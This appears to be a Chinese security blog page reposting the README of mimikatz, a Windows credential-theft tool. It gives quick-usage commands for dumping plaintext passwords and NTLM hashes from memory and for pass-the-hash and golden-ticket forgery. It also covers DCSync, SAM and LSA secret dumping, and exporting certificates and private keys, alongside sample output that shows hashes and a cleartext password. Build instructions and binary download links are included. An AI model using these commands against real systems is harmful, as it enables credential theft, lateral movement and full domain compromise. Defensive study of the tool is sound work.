<!DOCTYPE HTML>
<html lang="zh-CN">
<head>
    

<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta name="keywords" content="pgg,信息安全，小白教程，情感博主">
    <meta name="description" content="mimikatzmimikatz is a tool I’ve made to learn C and make somes experiments with Windows security.
It’s now well known to">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>pgg学长</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/font-awesome.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/css/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-2.2.0.min.js"></script>
<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>

</head>

<body>

<header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="container">
            <div class="nav-wrapper">
                <div class="brand-logo">
                    <a href="/" class="waves-effect waves-light">
                        
                        <img src="/medias/logo.png" class="logo-img hide-on-small-only">
                        
                        <span class="logo-span">pgg学长</span>
                    </a>
                </div>
                
            </div>
        </div>

        
    </nav>
</header>





<div class="bg-cover post-cover" style="background-image: url('/medias/featureimages/0.jpg')">
    <div class="container">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <div class="description center-align post-title">
                        
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>



<main class="container content">

    
    <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            
            <div class="post-info">
                

                <span class="post-date">
                    <i class="fa fa-clock-o fa-fw"></i>2019-05-09
                </span>
            </div>
        </div>
        <hr>
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="mimikatz"><a href="#mimikatz" class="headerlink" title="mimikatz"></a>mimikatz</h1><p><strong><code>mimikatz</code></strong> is a tool I’ve made to learn <code>C</code> and make somes experiments with Windows security.</p>
<p>It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. <strong><code>mimikatz</code></strong> can also perform pass-the-hash, pass-the-ticket or build <em>Golden tickets</em>.</p>
<pre><code>  .#####.   mimikatz 2.0 alpha (x86) release &quot;Kiwi en C&quot; (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 &#39;## v ##&#39;   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  &#39;#####&#39;                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege &#39;20&#39; OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...
</code></pre><p>But that’s not all! <code>Crypto</code>, <code>Terminal Server</code>, <code>Events</code>, … lots of informations in the GitHub Wiki <a href="https://github.com/gentilkiwi/mimikatz/wiki" target="_blank" rel="noopener">https://github.com/gentilkiwi/mimikatz/wiki</a> or on <a href="http://blog.gentilkiwi.com" target="_blank" rel="noopener">http://blog.gentilkiwi.com</a> (in French, <em>yes</em>).</p>
<p>If you don’t want to build it, binaries are availables on <a href="https://github.com/gentilkiwi/mimikatz/releases" target="_blank" rel="noopener">https://github.com/gentilkiwi/mimikatz/releases</a></p>
<h2 id="Quick-usage"><a href="#Quick-usage" class="headerlink" title="Quick usage"></a>Quick usage</h2><pre><code>log
privilege::debug
</code></pre><h3 id="sekurlsa"><a href="#sekurlsa" class="headerlink" title="sekurlsa"></a>sekurlsa</h3><pre><code>sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
</code></pre><h3 id="kerberos"><a href="#kerberos" class="headerlink" title="kerberos"></a>kerberos</h3><pre><code>kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
</code></pre><h3 id="crypto"><a href="#crypto" class="headerlink" title="crypto"></a>crypto</h3><pre><code>crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export
</code></pre><h3 id="vault-amp-lsadump"><a href="#vault-amp-lsadump" class="headerlink" title="vault &amp; lsadump"></a>vault &amp; lsadump</h3><pre><code>vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local
</code></pre><h2 id="Build"><a href="#Build" class="headerlink" title="Build"></a>Build</h2><p><code>mimikatz</code> is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:</p>
<ul>
<li>for <code>mimikatz</code> and <code>mimilib</code> : Visual Studio 2010, 2012 or 2013 for Desktop (<strong>2013 Express for Desktop is free and supports x86 &amp; x64</strong> - <a href="http://www.microsoft.com/download/details.aspx?id=44914" target="_blank" rel="noopener">http://www.microsoft.com/download/details.aspx?id=44914</a>)</li>
<li><em>for <code>mimikatz driver</code>, <code>mimilove</code> (and <code>ddk2003</code> platform) : Windows Driver Kit <strong>7.1</strong> (WinDDK) - <a href="http://www.microsoft.com/download/details.aspx?id=11800" target="_blank" rel="noopener">http://www.microsoft.com/download/details.aspx?id=11800</a></em></li>
</ul>
<p><code>mimikatz</code> uses <code>SVN</code> for source control, but is now available with <code>GIT</code> too!<br>You can use any tools you want to sync, even incorporated <code>GIT</code> in Visual Studio 2013 =)</p>
<h3 id="Synchronize"><a href="#Synchronize" class="headerlink" title="Synchronize!"></a>Synchronize!</h3><ul>
<li>GIT URL is  : <a href="https://github.com/gentilkiwi/mimikatz.git" target="_blank" rel="noopener">https://github.com/gentilkiwi/mimikatz.git</a></li>
<li>SVN URL is  : <a href="https://github.com/gentilkiwi/mimikatz/trunk" target="_blank" rel="noopener">https://github.com/gentilkiwi/mimikatz/trunk</a></li>
<li>ZIP file is : <a href="https://github.com/gentilkiwi/mimikatz/archive/master.zip" target="_blank" rel="noopener">https://github.com/gentilkiwi/mimikatz/archive/master.zip</a></li>
</ul>
<h3 id="Build-the-solution"><a href="#Build-the-solution" class="headerlink" title="Build the solution"></a>Build the solution</h3><ul>
<li>After opening the solution, <code>Build</code> / <code>Build Solution</code> (you can change architecture)</li>
<li><code>mimikatz</code> is now built and ready to be used! (<code>Win32</code> / <code>x64</code> evan <code>ARM64</code> if you’re lucky)<ul>
<li>you can have error <code>MSB3073</code> about <code>_build_.cmd</code> and <code>mimidrv</code>, it’s because the driver cannot be build without Windows Driver Kit <strong>7.1</strong> (WinDDK), but <code>mimikatz</code> and <code>mimilib</code> are OK.</li>
</ul>
</li>
</ul>
<h3 id="ddk2003"><a href="#ddk2003" class="headerlink" title="ddk2003"></a>ddk2003</h3><p>With this optional MSBuild platform, you can use the WinDDK build tools, and the default <code>msvcrt</code> runtime (smaller binaries, no dependencies)</p>
<p>For this optional platform, Windows Driver Kit <strong>7.1</strong> (WinDDK) - <a href="http://www.microsoft.com/download/details.aspx?id=11800" target="_blank" rel="noopener">http://www.microsoft.com/download/details.aspx?id=11800</a> and Visual Studio <strong>2010</strong> are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.</p>
<p>Follow instructions:</p>
<ul>
<li><a href="http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme" target="_blank" rel="noopener">http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme</a></li>
<li><em><a href="http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader" target="_blank" rel="noopener">http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader</a></em></li>
</ul>
<h2 id="Licence"><a href="#Licence" class="headerlink" title="Licence"></a>Licence</h2><p>CC BY 4.0 licence - <a href="https://creativecommons.org/licenses/by/4.0/" target="_blank" rel="noopener">https://creativecommons.org/licenses/by/4.0/</a></p>
<p><code>mimikatz</code> needs coffee to be developed:</p>
<ul>
<li>PayPal: <a href="https://www.paypal.me/delpy/" target="_blank" rel="noopener">https://www.paypal.me/delpy/</a></li>
</ul>
<h2 id="Author"><a href="#Author" class="headerlink" title="Author"></a>Author</h2><ul>
<li>Benjamin DELPY <code>gentilkiwi</code>, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )</li>
<li>DCSync function in <code>lsadump</code> module was co-writed with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( <a href="http://www.mysmartlogon.com" target="_blank" rel="noopener">http://www.mysmartlogon.com</a> )</li>
</ul>
<p>This is a <strong>personal</strong> development, please respect its philosophy and don’t use it for bad things!</p>

            </div>
            <hr>

            
            <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.88rem;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff;
        background-color: #22AB38;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff;
        background-color: #019FE8;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a class="reward-link btn-floating btn-large waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close"><i class="fa fa-close"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs">
                        <li class="tab wechat-tab waves-effect waves-light"><a class="active" href="#wechat">微信</a></li>
                        <li class="tab alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                    </ul>
                    <div id="wechat">
                        <img src="/medias/reward/ddac.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                    <div id="alipay">
                        <img src="/medias/reward/abcd.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('#reward .reward-link').on('click', function () {
            $('#rewardModal').openModal();
        });

        $('#rewardModal .close').on('click', function () {
            $('#rewardModal').closeModal();
        });
    });
</script>
            

            

            <div class="reprint">
                <p>
                    <span class="reprint-tip">转载请注明: </span>
                    <a href="https://pgg666.org" class="b-link-green">pgg学长</a>
                    <i class="fa fa-angle-right fa-lg fa-fw text-color"></i>
                    <a href="/2019/05/09/README/" class="b-link-green"></a>
                </p>
            </div>
        </div>
    </div>

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">本篇</div>
            <div class="card">
                <a href="/2019/05/09/README/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/0.jpg" class="responsive-img" alt="">
                        
                        <span class="card-title"></span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary">mimikatzmimikatz is a tool I’ve made to learn C and make somes experiments with Windows security.
It’s now well known to</div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="fa fa-clock-o fa-fw icon-date"></i>2019-05-09
                            </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-user fa-fw"></i>
                            pgg
                            
                        </span>
                    </div>
                </div>

                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">下一篇</div>
            <div class="card">
                <a href="/2019/04/28/入侵提权内网渗透/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/6.jpg" class="responsive-img" alt="入侵提权内网渗透(完整版)">
                        
                        <span class="card-title">入侵提权内网渗透(完整版)</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary">入侵提权内网渗透(完整版)​              #注：这次靶机测试，我搞了两天，被靶机秀成了麻瓜，接下来我带领大家领略入侵的快感，当然，你们会看的头皮发麻  哈哈
​         亲爱的老师给了我们一个ip  192.168.0</div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="fa fa-clock-o fa-fw icon-date"></i>2019-04-28
                            </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-user fa-fw"></i>
                            pgg
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
</article>
</div>
    

</main>




<!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title">搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字" class="search-input" autofocus>
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
</script>
<!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fa fa-angle-up"></i>
    </a>
</div>


<script src="/libs/materialize/js/materialize.min.js"></script>
<script src="/libs/masonry/masonry.pkgd.min.js"></script>
<script src="/libs/aos/aos.js"></script>
<script src="/libs/scrollprogress/scrollProgress.min.js"></script>
<script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
<script src="/js/matery.js"></script>
<!-- Global site tag (gtag.js) - Google Analytics -->


</body>
</html>